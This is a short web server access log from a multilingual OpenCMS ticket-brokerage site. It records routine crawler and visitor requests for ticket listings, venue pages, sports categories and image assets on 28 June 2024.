3.224.220.101 - - [28/Jun/2024:01:03:38 +0200] "GET /ticket2/opencms/nl/buy/?edid=1B1B1FC4-4D35-11C5-5D85-DF2C3A11720F&page=1 HTTP/1.1" 200 84811
3.224.220.101 - - [28/Jun/2024:01:03:43 +0200] "GET /ticket2/opencms/nl/buy/?edid=B63A2D15-1363-3F7D-6FAD-9E0AE65FC077&page=1 HTTP/1.1" 200 84823
94.23.7.188 - - [28/Jun/2024:01:03:43 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5BB515D6-4A71-F83B-2070-837601175DFA&sortorder=asc&column=section HTTP/1.1" 200 87519
216.245.221.83 - - [28/Jun/2024:01:03:45 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [28/Jun/2024:01:03:45 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
3.224.220.101 - - [28/Jun/2024:01:03:46 +0200] "GET /ticket2/opencms/nl/buy/?edid=BBDCBF15-1B06-DD9F-49B6-3829D3B56DBC&page=1 HTTP/1.1" 200 84821
5.9.55.228 - - [28/Jun/2024:01:03:49 +0200] "GET /ticket2/opencms/en/venue/?countryid=A120839E-3691-C1CC-A7E6-AFA581C3B971 HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:01:03:50 +0200] "GET /ticket2/opencms/nl/buy/?edid=DBD7C3FF-3D2D-1BC9-F87B-06E7F5EA9FFB&page=1 HTTP/1.1" 200 84811
66.249.77.35 - - [28/Jun/2024:01:03:53 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/manchester_united/ HTTP/1.1" 200 87231
3.224.220.101 - - [28/Jun/2024:01:03:54 +0200] "GET /ticket2/opencms/nl/buy/?edid=23688B8D-8D21-EBA0-1897-8BC6CFFE57DE&page=1 HTTP/1.1" 200 84813
94.23.7.188 - - [28/Jun/2024:01:03:55 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5C32C181-43E5-011F-4117-B8BE3780A7C3&sortorder=asc&column=price HTTP/1.1" 200 88809
3.224.220.101 - - [28/Jun/2024:01:03:58 +0200] "GET /ticket2/opencms/nl/buy/?edid=16343486-D199-EE91-1004-52E02A9487CB&page=1 HTTP/1.1" 200 84815
23.22.35.162 - - [28/Jun/2024:01:04:03 +0200] "GET /ticket2/opencms/nl/buy/?edid=AD14D102-9A59-3E48-721F-B8412449464B&page=1 HTTP/1.1" 200 84813
47.128.125.213 - - [28/Jun/2024:01:04:04 +0200] "GET /ticket2/opencms/de/sport/fussball-tickets/bundesliga/hoffenheim/ HTTP/1.1" 200 76614
47.128.125.213 - - [28/Jun/2024:01:04:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
5.9.55.228 - - [28/Jun/2024:01:04:06 +0200] "GET /ticket2/opencms/en/venue/?countryid=A07C6930-60EB-29AC-3FDB-C97CE816C6C1 HTTP/1.1" 200 100730
47.128.125.213 - - [28/Jun/2024:01:04:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
52.70.240.171 - - [28/Jun/2024:01:04:06 +0200] "GET /ticket2/opencms/nl/buy/?edid=BF02E8D3-250D-1BB9-F307-8D142E1902AE&page=1 HTTP/1.1" 200 84814
47.128.125.213 - - [28/Jun/2024:01:04:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.125.213 - - [28/Jun/2024:01:04:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
